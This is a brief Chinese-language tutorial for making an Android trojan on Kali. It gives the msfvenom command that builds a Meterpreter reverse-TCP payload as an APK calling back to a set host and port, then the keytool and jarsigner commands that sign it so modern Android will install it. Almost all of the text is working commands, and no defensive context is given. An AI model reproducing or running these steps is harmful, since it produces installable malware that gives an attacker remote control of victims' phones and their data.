环境

1. KaLi
2. Android 手机或虚拟机

生成Android木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=7777 R>shell.apk

• LHOST 本地IP
• LPORT 本地端口

Android木马签名

msf生成的安卓木马在目前的安卓系统中需要进行数字签名才可被安装使用。

生成签名证书

keytool -genkey -v -keystore apk-trojan-key.keystore -alias aliasname -keyalg RSA -keysize 1024 -validity 999

• v:显示密匙库证书的详细信息
• keystore：指定密匙库名称
• alias：产生别名
• keyalg：指定算法，默认为（DSA）
• keysize：指定密匙长度
• validity：指定证书有效期（默认为90天）

对APK进行签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk aliasname